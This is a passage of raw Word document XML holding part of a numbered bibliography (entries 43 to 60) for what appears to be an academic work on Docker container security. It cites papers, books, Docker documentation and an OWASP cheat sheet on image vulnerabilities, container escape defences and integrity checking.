                    <w:tcW w:w="0" w:type="auto"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w14:paraId="0AEA3A0A" w14:textId="77777777" w:rsidR="00A13BEC" w:rsidRDefault="00A13BEC">
                    <w:pPr>
                      <w:pStyle w:val="Bibliography"/>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">A. Efe, U. Aslan and e. al, “Securing Vulnerabilities in Docker Images,” </w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:i/>
                        <w:iCs/>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">International Journal of Innovative Engineering Applications, </w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">vol. 4, no. 1, pp. 31-39, 2020. </w:t>
                    </w:r>
                  </w:p>
                </w:tc>
              </w:tr>
              <w:tr w:rsidR="00A13BEC" w14:paraId="362FB38B" w14:textId="77777777">
                <w:trPr>
                  <w:divId w:val="1437796017"/>
                  <w:tblCellSpacing w:w="15" w:type="dxa"/>
                </w:trPr>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="50" w:type="pct"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w14:paraId="50512BA9" w14:textId="77777777" w:rsidR="00A13BEC" w:rsidRDefault="00A13BEC">
                    <w:pPr>
                      <w:pStyle w:val="Bibliography"/>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">[44] </w:t>
                    </w:r>
                  </w:p>
                </w:tc>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="0" w:type="auto"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w14:paraId="5504DA18" w14:textId="77777777" w:rsidR="00A13BEC" w:rsidRDefault="00A13BEC">
                    <w:pPr>
                      <w:pStyle w:val="Bibliography"/>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">S. Gallagher, Securing Docker, Packt Publishing, 2016. </w:t>
                    </w:r>
                  </w:p>
                </w:tc>
              </w:tr>
              <w:tr w:rsidR="00A13BEC" w14:paraId="0726D2F3" w14:textId="77777777">
                <w:trPr>
                  <w:divId w:val="1437796017"/>
                  <w:tblCellSpacing w:w="15" w:type="dxa"/>
                </w:trPr>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="50" w:type="pct"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w14:paraId="5F07B9C1" w14:textId="77777777" w:rsidR="00A13BEC" w:rsidRDefault="00A13BEC">
                    <w:pPr>
                      <w:pStyle w:val="Bibliography"/>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">[45] </w:t>
                    </w:r>
                  </w:p>
                </w:tc>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="0" w:type="auto"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w14:paraId="466E0E49" w14:textId="77777777" w:rsidR="00A13BEC" w:rsidRDefault="00A13BEC">
                    <w:pPr>
                      <w:pStyle w:val="Bibliography"/>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:t>docker , “docker,” docker , 2016. [Online]. Available: https://docs.docker.com/network/. [Accessed 11 July 2021].</w:t>
                    </w:r>
                  </w:p>
                </w:tc>
              </w:tr>
              <w:tr w:rsidR="00A13BEC" w14:paraId="46AF6940" w14:textId="77777777">
                <w:trPr>
                  <w:divId w:val="1437796017"/>
                  <w:tblCellSpacing w:w="15" w:type="dxa"/>
                </w:trPr>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="50" w:type="pct"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w14:paraId="7777723D" w14:textId="77777777" w:rsidR="00A13BEC" w:rsidRDefault="00A13BEC">
                    <w:pPr>
                      <w:pStyle w:val="Bibliography"/>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">[46] </w:t>
                    </w:r>
                  </w:p>
                </w:tc>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="0" w:type="auto"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w14:paraId="3C6696AE" w14:textId="77777777" w:rsidR="00A13BEC" w:rsidRDefault="00A13BEC">
                    <w:pPr>
                      <w:pStyle w:val="Bibliography"/>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">T. Combe, A. Martin and R. D. Pietro, “To Docker or Not to Docker: A Security Perspective,” </w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:i/>
                        <w:iCs/>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">IEEE Cloud Computing, </w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">vol. 5, no. 3, pp. 54-62, 2016. </w:t>
                    </w:r>
                  </w:p>
                </w:tc>
              </w:tr>
              <w:tr w:rsidR="00A13BEC" w14:paraId="4BCBF5FD" w14:textId="77777777">
                <w:trPr>
                  <w:divId w:val="1437796017"/>
                  <w:tblCellSpacing w:w="15" w:type="dxa"/>
                </w:trPr>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="50" w:type="pct"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w14:paraId="5265A67F" w14:textId="77777777" w:rsidR="00A13BEC" w:rsidRDefault="00A13BEC">
                    <w:pPr>
                      <w:pStyle w:val="Bibliography"/>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">[47] </w:t>
                    </w:r>
                  </w:p>
                </w:tc>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="0" w:type="auto"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w14:paraId="20B145B5" w14:textId="77777777" w:rsidR="00A13BEC" w:rsidRDefault="00A13BEC">
                    <w:pPr>
                      <w:pStyle w:val="Bibliography"/>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:t>docker, “Content trust in Docker | Docker Documentation,” docker, 2016. [Online]. Available: https://docs.docker.com/engine/security/trust/. [Accessed 15 July 2021].</w:t>
                    </w:r>
                  </w:p>
                </w:tc>
              </w:tr>
              <w:tr w:rsidR="00A13BEC" w14:paraId="09BE08D0" w14:textId="77777777">
                <w:trPr>
                  <w:divId w:val="1437796017"/>
                  <w:tblCellSpacing w:w="15" w:type="dxa"/>
                </w:trPr>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="50" w:type="pct"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w14:paraId="6AA8BE74" w14:textId="77777777" w:rsidR="00A13BEC" w:rsidRDefault="00A13BEC">
                    <w:pPr>
                      <w:pStyle w:val="Bibliography"/>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">[48] </w:t>
                    </w:r>
                  </w:p>
                </w:tc>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="0" w:type="auto"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w14:paraId="669F5648" w14:textId="77777777" w:rsidR="00A13BEC" w:rsidRDefault="00A13BEC">
                    <w:pPr>
                      <w:pStyle w:val="Bibliography"/>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:t>github, “GitHub - theupdateframework/notary: Notary is a project that allows anyone to have trust over arbitrary collections of data,” github, [Online]. Available: https://github.com/theupdateframework/notary. [Accessed 12 July 2021].</w:t>
                    </w:r>
                  </w:p>
                </w:tc>
              </w:tr>
              <w:tr w:rsidR="00A13BEC" w14:paraId="4509269D" w14:textId="77777777">
                <w:trPr>
                  <w:divId w:val="1437796017"/>
                  <w:tblCellSpacing w:w="15" w:type="dxa"/>
                </w:trPr>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="50" w:type="pct"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w14:paraId="5A64C251" w14:textId="77777777" w:rsidR="00A13BEC" w:rsidRDefault="00A13BEC">
                    <w:pPr>
                      <w:pStyle w:val="Bibliography"/>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">[49] </w:t>
                    </w:r>
                  </w:p>
                </w:tc>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="0" w:type="auto"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w14:paraId="667F8473" w14:textId="77777777" w:rsidR="00A13BEC" w:rsidRDefault="00A13BEC">
                    <w:pPr>
                      <w:pStyle w:val="Bibliography"/>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">D. Merkel, “Docker: lightweight linux containers for consistent development and deployment,” </w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:i/>
                        <w:iCs/>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">Linux journal, </w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">vol. 239, no. 2, pp. 1-5, 2014. </w:t>
                    </w:r>
                  </w:p>
                </w:tc>
              </w:tr>
              <w:tr w:rsidR="00A13BEC" w14:paraId="10751A29" w14:textId="77777777">
                <w:trPr>
                  <w:divId w:val="1437796017"/>
                  <w:tblCellSpacing w:w="15" w:type="dxa"/>
                </w:trPr>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="50" w:type="pct"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w14:paraId="0B1B3206" w14:textId="77777777" w:rsidR="00A13BEC" w:rsidRDefault="00A13BEC">
                    <w:pPr>
                      <w:pStyle w:val="Bibliography"/>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">[50] </w:t>
                    </w:r>
                  </w:p>
                </w:tc>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="0" w:type="auto"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w14:paraId="2D5AD39E" w14:textId="77777777" w:rsidR="00A13BEC" w:rsidRDefault="00A13BEC">
                    <w:pPr>
                      <w:pStyle w:val="Bibliography"/>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">X. Xu, A. Xu, Y. Jiang and e. al, “Research on Security Issues of Docker and Container Monitoring System in Edge Computing System,” </w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:i/>
                        <w:iCs/>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">Journal of Physics, </w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">vol. 1673, p. 012067, 2020. </w:t>
                    </w:r>
                  </w:p>
                </w:tc>
              </w:tr>
              <w:tr w:rsidR="00A13BEC" w14:paraId="38F9D487" w14:textId="77777777">
                <w:trPr>
                  <w:divId w:val="1437796017"/>
                  <w:tblCellSpacing w:w="15" w:type="dxa"/>
                </w:trPr>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="50" w:type="pct"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w14:paraId="77794E7D" w14:textId="77777777" w:rsidR="00A13BEC" w:rsidRDefault="00A13BEC">
                    <w:pPr>
                      <w:pStyle w:val="Bibliography"/>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">[51] </w:t>
                    </w:r>
                  </w:p>
                </w:tc>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="0" w:type="auto"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w14:paraId="03C50913" w14:textId="77777777" w:rsidR="00A13BEC" w:rsidRDefault="00A13BEC">
                    <w:pPr>
                      <w:pStyle w:val="Bibliography"/>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">R. Yasrab, “Mitigating Docker Security Issues,” </w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:i/>
                        <w:iCs/>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">arXiv preprint arXiv:1804.05039, </w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">pp. 1-11, 2018. </w:t>
                    </w:r>
                  </w:p>
                </w:tc>
              </w:tr>
              <w:tr w:rsidR="00A13BEC" w14:paraId="481A4303" w14:textId="77777777">
                <w:trPr>
                  <w:divId w:val="1437796017"/>
                  <w:tblCellSpacing w:w="15" w:type="dxa"/>
                </w:trPr>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="50" w:type="pct"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w14:paraId="635B027A" w14:textId="77777777" w:rsidR="00A13BEC" w:rsidRDefault="00A13BEC">
                    <w:pPr>
                      <w:pStyle w:val="Bibliography"/>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:lastRenderedPageBreak/>
                      <w:t xml:space="preserve">[52] </w:t>
                    </w:r>
                  </w:p>
                </w:tc>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="0" w:type="auto"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w14:paraId="357AEE71" w14:textId="77777777" w:rsidR="00A13BEC" w:rsidRDefault="00A13BEC">
                    <w:pPr>
                      <w:pStyle w:val="Bibliography"/>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">Z. Jian and L. Chen, “A Defense Method against Docker Escape Attack,” </w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:i/>
                        <w:iCs/>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">Proceedings of the 2017 International Conference on Cryptography, Security and Privacy, </w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">pp. 142-146, 2017. </w:t>
                    </w:r>
                  </w:p>
                </w:tc>
              </w:tr>
              <w:tr w:rsidR="00A13BEC" w14:paraId="7B23D134" w14:textId="77777777">
                <w:trPr>
                  <w:divId w:val="1437796017"/>
                  <w:tblCellSpacing w:w="15" w:type="dxa"/>
                </w:trPr>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="50" w:type="pct"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w14:paraId="32899B63" w14:textId="77777777" w:rsidR="00A13BEC" w:rsidRDefault="00A13BEC">
                    <w:pPr>
                      <w:pStyle w:val="Bibliography"/>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">[53] </w:t>
                    </w:r>
                  </w:p>
                </w:tc>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="0" w:type="auto"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w14:paraId="641B01E0" w14:textId="77777777" w:rsidR="00A13BEC" w:rsidRDefault="00A13BEC">
                    <w:pPr>
                      <w:pStyle w:val="Bibliography"/>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">M. D. Benedictis and A. Lioy, “Integrity verification of Docker containers for a lightweight cloud environment,” </w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:i/>
                        <w:iCs/>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">Future Generation Computer Systems, </w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">vol. 97, pp. 236-246, 2019. </w:t>
                    </w:r>
                  </w:p>
                </w:tc>
              </w:tr>
              <w:tr w:rsidR="00A13BEC" w14:paraId="576B74BF" w14:textId="77777777">
                <w:trPr>
                  <w:divId w:val="1437796017"/>
                  <w:tblCellSpacing w:w="15" w:type="dxa"/>
                </w:trPr>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="50" w:type="pct"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w14:paraId="281DA823" w14:textId="77777777" w:rsidR="00A13BEC" w:rsidRDefault="00A13BEC">
                    <w:pPr>
                      <w:pStyle w:val="Bibliography"/>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">[54] </w:t>
                    </w:r>
                  </w:p>
                </w:tc>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="0" w:type="auto"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w14:paraId="14C7FE17" w14:textId="77777777" w:rsidR="00A13BEC" w:rsidRDefault="00A13BEC">
                    <w:pPr>
                      <w:pStyle w:val="Bibliography"/>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">X. Lin, L. Lei, Y. Wang and et.el, “A Measurement Study on Linux Container Security: Attacks and Countermeasures,” </w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:i/>
                        <w:iCs/>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">Proceedings of the 34th Annual Computer Security Applications Conference, </w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">pp. 418-429, 2018. </w:t>
                    </w:r>
                  </w:p>
                </w:tc>
              </w:tr>
              <w:tr w:rsidR="00A13BEC" w14:paraId="5C8D06E3" w14:textId="77777777">
                <w:trPr>
                  <w:divId w:val="1437796017"/>
                  <w:tblCellSpacing w:w="15" w:type="dxa"/>
                </w:trPr>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="50" w:type="pct"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w14:paraId="506AACA9" w14:textId="77777777" w:rsidR="00A13BEC" w:rsidRDefault="00A13BEC">
                    <w:pPr>
                      <w:pStyle w:val="Bibliography"/>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">[55] </w:t>
                    </w:r>
                  </w:p>
                </w:tc>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="0" w:type="auto"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w14:paraId="276EB11A" w14:textId="77777777" w:rsidR="00A13BEC" w:rsidRDefault="00A13BEC">
                    <w:pPr>
                      <w:pStyle w:val="Bibliography"/>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:t>OWASP, “Docker Security Cheat Sheet,” OWASP, [Online]. Available: https://cheatsheetseries.owasp.org/cheatsheets/Docker_Security_Cheat_Sheet.html. [Accessed 14 July 2021].</w:t>
                    </w:r>
                  </w:p>
                </w:tc>
              </w:tr>
              <w:tr w:rsidR="00A13BEC" w14:paraId="753BF26C" w14:textId="77777777">
                <w:trPr>
                  <w:divId w:val="1437796017"/>
                  <w:tblCellSpacing w:w="15" w:type="dxa"/>
                </w:trPr>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="50" w:type="pct"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w14:paraId="294E2781" w14:textId="77777777" w:rsidR="00A13BEC" w:rsidRDefault="00A13BEC">
                    <w:pPr>
                      <w:pStyle w:val="Bibliography"/>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">[56] </w:t>
                    </w:r>
                  </w:p>
                </w:tc>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="0" w:type="auto"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w14:paraId="364E4F10" w14:textId="77777777" w:rsidR="00A13BEC" w:rsidRDefault="00A13BEC">
                    <w:pPr>
                      <w:pStyle w:val="Bibliography"/>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:t>E. Windisch, “On the Security of Containers,” 23 October 2014. [Online]. Available: https://medium.com/@ewindisch/on-the-security-of-containers-2c60ffe25a9e. [Accessed 15 July 2021].</w:t>
                    </w:r>
                  </w:p>
                </w:tc>
              </w:tr>
              <w:tr w:rsidR="00A13BEC" w14:paraId="3FAE6020" w14:textId="77777777">
                <w:trPr>
                  <w:divId w:val="1437796017"/>
                  <w:tblCellSpacing w:w="15" w:type="dxa"/>
                </w:trPr>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="50" w:type="pct"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w14:paraId="17D022BB" w14:textId="77777777" w:rsidR="00A13BEC" w:rsidRDefault="00A13BEC">
                    <w:pPr>
                      <w:pStyle w:val="Bibliography"/>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">[57] </w:t>
                    </w:r>
                  </w:p>
                </w:tc>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="0" w:type="auto"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w14:paraId="26D11F66" w14:textId="77777777" w:rsidR="00A13BEC" w:rsidRDefault="00A13BEC">
                    <w:pPr>
                      <w:pStyle w:val="Bibliography"/>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">S. Upadhya, J. Shetty, R. Rajeshwari and e. al, “A State-of-Art Review of Docker Container Security Issues and Solutions,” </w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:i/>
                        <w:iCs/>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">American International Journal of Research in Science, Technology, Engineering \&amp; Mathematics, </w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">vol. 17, no. 1, pp. 33-36, 2016. </w:t>
                    </w:r>
                  </w:p>
                </w:tc>
              </w:tr>
              <w:tr w:rsidR="00A13BEC" w14:paraId="0DFB0177" w14:textId="77777777">
                <w:trPr>
                  <w:divId w:val="1437796017"/>
                  <w:tblCellSpacing w:w="15" w:type="dxa"/>
                </w:trPr>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="50" w:type="pct"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w14:paraId="1FAA7DD3" w14:textId="77777777" w:rsidR="00A13BEC" w:rsidRDefault="00A13BEC">
                    <w:pPr>
                      <w:pStyle w:val="Bibliography"/>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">[58] </w:t>
                    </w:r>
                  </w:p>
                </w:tc>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="0" w:type="auto"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w14:paraId="6AA9C517" w14:textId="77777777" w:rsidR="00A13BEC" w:rsidRDefault="00A13BEC">
                    <w:pPr>
                      <w:pStyle w:val="Bibliography"/>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:t>J. Rudenberg, “Docker Image Insecurity,” 23 December 2014. [Online]. Available: https://titanous.com/posts/docker-insecurity. [Accessed 16 July 2021].</w:t>
                    </w:r>
                  </w:p>
                </w:tc>
              </w:tr>
              <w:tr w:rsidR="00A13BEC" w14:paraId="7D603FCA" w14:textId="77777777">
                <w:trPr>
                  <w:divId w:val="1437796017"/>
                  <w:tblCellSpacing w:w="15" w:type="dxa"/>
                </w:trPr>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="50" w:type="pct"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w14:paraId="7173DA3D" w14:textId="77777777" w:rsidR="00A13BEC" w:rsidRDefault="00A13BEC">
                    <w:pPr>
                      <w:pStyle w:val="Bibliography"/>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">[59] </w:t>
                    </w:r>
                  </w:p>
                </w:tc>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="0" w:type="auto"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w14:paraId="04885637" w14:textId="77777777" w:rsidR="00A13BEC" w:rsidRDefault="00A13BEC">
                    <w:pPr>
                      <w:pStyle w:val="Bibliography"/>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">D. F. Gonz´alez, F. Lera and G. Esteban, “SecDocker: Hardening the Continuous Integration Workflow Wrapping the container layer,” </w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:i/>
                        <w:iCs/>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">arXiv e-prints, </w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">pp. 1-15, 2021. </w:t>
                    </w:r>
                  </w:p>
                </w:tc>
              </w:tr>
              <w:tr w:rsidR="00A13BEC" w14:paraId="568CDD2A" w14:textId="77777777">
                <w:trPr>
                  <w:divId w:val="1437796017"/>
                  <w:tblCellSpacing w:w="15" w:type="dxa"/>
                </w:trPr>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="50" w:type="pct"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w14:paraId="707C10FB" w14:textId="77777777" w:rsidR="00A13BEC" w:rsidRDefault="00A13BEC">
                    <w:pPr>
                      <w:pStyle w:val="Bibliography"/>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">[60] </w:t>
                    </w:r>
                  </w:p>
                </w:tc>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="0" w:type="auto"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w14:paraId="62A45CE6" w14:textId="77777777" w:rsidR="00A13BEC" w:rsidRDefault="00A13BEC">
                    <w:pPr>
                      <w:pStyle w:val="Bibliography"/>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">J. Chelladhurai, P. R. Chelliah and S. A. Kumar, “Securing docker containers from Denial of Service (DoS) attacks,” </w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:i/>
                        <w:iCs/>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">Proceedings - 2016 IEEE International Conference on Services Computing, SCC 2016, </w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
